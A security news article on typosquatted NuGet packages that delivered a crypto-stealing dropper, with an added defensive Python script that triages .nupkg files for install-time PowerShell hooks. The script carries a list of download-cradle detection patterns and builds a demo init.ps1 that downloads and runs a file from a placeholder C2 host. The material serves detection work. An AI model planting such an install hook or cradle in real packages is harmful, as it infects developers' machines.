Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware

March 22, 2023 | Ravie Lakshmanan | DevOpsSec / Malware

NuGet repositories have been targeted in a new “sophisticated and highly malicious attack” aimed at infecting .NET developer systems with cryptocurrency stealer malware.

The 13 malicious packages, downloaded more than 160,000 times over the past month, have since been removed from the repository.

JFrog researchers Natan Nehorai and Brian Moussalli said, “The package contained a PowerShell script that ran on installation and triggered the download of a remotely executable ‘second stage’ payload.”

NuGet packages have previously been found to contain vulnerabilities and have been abused to spread phishing links, but this is the first time packages on the repository have been found to carry malicious code.

The three most downloaded packages (Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API) alone accounted for 166,000 downloads. The attackers appear to have used bots to artificially inflate the download counts, which would have made the packages look more established and trustworthy than they were.

The use of the Coinbase and Discord names underscores the continued reliance on typosquatting, in which fake packages are given names that closely resemble legitimate ones in order to trick developers into installing them.

The malware embedded in the packages acts as a dropper: a PowerShell script that runs automatically when the package is installed and retrieves follow-on binaries from hardcoded servers.

As an additional layer of obfuscation, some packages did not embed the malicious payload directly but pulled it in as a dependency on another booby-trapped package, so the offending script never appeared in the package a developer actually chose to install.

To make matters worse, connections to the command-and-control (C2) servers are made over plaintext HTTP rather than HTTPS, leaving them open to adversary-in-the-middle (AitM) attacks: anyone positioned on the network path could inspect or replace the payload in transit.

The second-stage malware, described by JFrog as a “fully customized executable payload,” is fetched from the C2 server at install time, which means the operators can swap it for a different binary at will without republishing the package.
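The installation hook, the HTTP download cradle and the hidden-dependency trick described above are all visible inside a .nupkg before it is ever installed, because a .nupkg is just a zip archive with a .nuspec manifest. The triage script below is an added example (not JFrog's tooling and not code from the reported packages) that opens a package offline, flags install-time PowerShell hooks, looks for download-and-execute cradles and plaintext http:// URLs in them, and lists the declared dependencies so the same check can be run on each transitive package. The sample package it builds is constructed for the demo; "Example.Pkg", "Example.Helper" and the http://c2.example URL are placeholders, and the cradle pattern list reflects common PowerShell tradecraft rather than the specific strings used in this campaign.

```python
"""Offline triage of a NuGet .nupkg for install-time PowerShell droppers.

Added example; not JFrog's code and not taken from the malicious packages.
All package ids, file names and URLs below are constructed placeholders.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# NuGet executes tools/init.ps1 in the Visual Studio Package Manager Console
# the first time a package is installed into a solution; tools/install.ps1 was
# honoured by older packages.config-based installs. Both are code-execution
# hooks that should never appear in a package that only ships a library.
INSTALL_HOOKS = ("tools/init.ps1", "tools/install.ps1")

# Download-and-run cradles commonly seen in PowerShell droppers (assumed
# generic tradecraft, not the exact strings from the reported packages).
CRADLE_PATTERNS = [
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b",
    r"DownloadString|DownloadFile|DownloadData",
    r"Invoke-Expression|\biex\b",
    r"Start-Process",
]
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def _local_name(tag):
    """Strip the XML namespace; nuspec schemas differ between NuGet versions."""
    return tag.rsplit("}", 1)[-1]


def _scan_powershell(path, data, report):
    text = data.decode("utf-8", errors="replace")
    for pattern in CRADLE_PATTERNS:
        if re.search(pattern, text, re.IGNORECASE):
            report["cradles"].append((path, pattern))
    for url in URL_RE.findall(text):
        if url.lower().startswith("http://"):  # plaintext: replaceable in transit
            report["plaintext_http"].append((path, url))


def triage_nupkg(nupkg_bytes):
    """Return a report dict; keys are lists so callers can aggregate findings."""
    report = {"install_hooks": [], "cradles": [], "plaintext_http": [], "dependencies": []}
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as zf:
        for name in zf.namelist():
            lname = name.lower()
            if lname in INSTALL_HOOKS:
                report["install_hooks"].append(name)
            if lname.endswith((".ps1", ".psm1")):
                _scan_powershell(name, zf.read(name), report)
            elif lname.endswith(".nuspec"):
                root = ET.fromstring(zf.read(name))
                # Dependencies are where a clean-looking package can pull in the
                # booby-trapped one; each id should be triaged with this same function.
                for el in root.iter():
                    if _local_name(el.tag) == "dependency" and el.get("id"):
                        report["dependencies"].append(el.get("id"))
    return report


def is_suspicious(report):
    """A package that both installs a script hook and downloads code from it."""
    return bool(report["install_hooks"]) and bool(report["cradles"])


def build_demo_package(malicious):
    """CONSTRUCTED sample .nupkg mirroring the shape the article describes."""
    deps = '<dependencies><dependency id="Example.Helper" version="1.0.0" /></dependencies>'
    nuspec = (
        '<?xml version="1.0"?>'
        '<package xmlns="http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd">'
        "<metadata><id>Example.Pkg</id><version>1.0.0</version>"
        + (deps if malicious else "")
        + "</metadata></package>"
    )
    init_ps1 = (
        "param($installPath, $toolsPath, $package, $project)\n"
        "$u = 'http://c2.example/stage2.exe'  # placeholder C2, plaintext HTTP\n"
        "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\s.exe\")\n"
        "Start-Process \"$env:TEMP\\s.exe\"\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Example.Pkg.nuspec", nuspec)
        zf.writestr("lib/netstandard2.0/Example.Pkg.dll", b"MZ")  # stand-in binary
        if malicious:
            zf.writestr("tools/init.ps1", init_ps1)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        rep = triage_nupkg(build_demo_package(malicious=flag))
        print("suspicious" if is_suspicious(rep) else "clean", rep)
```

Two practical caveats when using a check like this: NuGet only runs these scripts from the Visual Studio Package Manager Console, so a CI pipeline restoring with `dotnet restore` would not trigger the dropper and would not notice it either, and a package whose own archive is clean can still be dangerous through its dependency list, which is why the report surfaces every declared dependency id for recursive triage rather than stopping at the top-level package.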


The second stage offers several capabilities, including a cryptocurrency stealer and an auto-update module that polls the C2 server for newer versions of the malware.

The findings come at a time when the software supply chain has become an increasingly attractive conduit for compromising developers' systems and smuggling backdoored code to downstream users.

“This proves that no open source repository is safe from malicious actors,” Shachar Menashe, senior director of JFrog Security Research, said in a statement to The Hacker News.

“.NET developers using NuGet are still at high risk of infecting their environment with malicious code and should exercise caution when curating the open source components they use in their builds and at all stages of the software development lifecycle, to ensure that the software supply chain remains secure.”
